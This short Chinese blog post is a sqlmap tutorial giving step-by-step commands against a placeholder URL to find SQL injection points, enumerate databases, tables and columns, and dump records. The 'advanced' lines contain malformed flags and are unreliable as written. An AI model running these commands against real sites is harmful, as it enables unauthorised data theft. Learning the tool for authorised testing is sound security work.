sqlmap注入工具

Posted prideassassin

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap注入工具相关的知识,希望对你有一定的参考价值。

sqlmap是sql自动注入工具。

sqlmap最基本用法:打开命令行交互界面。

1.检测是否存在注入点:sqlmap -u "ww.xxx.com/test.php?id=1"

2.检测数据库名:sqlmap -u "ww.xxx.com/test.php?id=1" --dbs

3.检测指定数据库的表名:sqlmap -u "ww.xxx.com/test.php?id=1" -D 数据库名 --tables

4.检测指定表的字段名:sqlmap -u "ww.xxx.com/test.php?id=1" -D 数据库名 -T 表名 --columns

5.检测指定表的记录:sqlmap -u "ww.xxx.com/test.php?id=1" -D 数据库 -T 表名 -C "列名1列名2" --dump

高级用法:

sqlmap -u  "注入点"  --current -db 返回当前依赖数据库

sqlmap -u  "注入点"  -current user

 

以上是关于sqlmap注入工具的主要内容,如果未能解决你的问题,请参考以下文章

sqlmap的学习之路-自动化测试SQL注入工具

SQL注入工具sqlmap的注入过程记录

sql注入工具之 sqlmap的基本使用

sql 注入工具sqlmap的使用

视频| SQL 注入工具 sqlmap 的使用

基础篇——SQL注入(工具注入)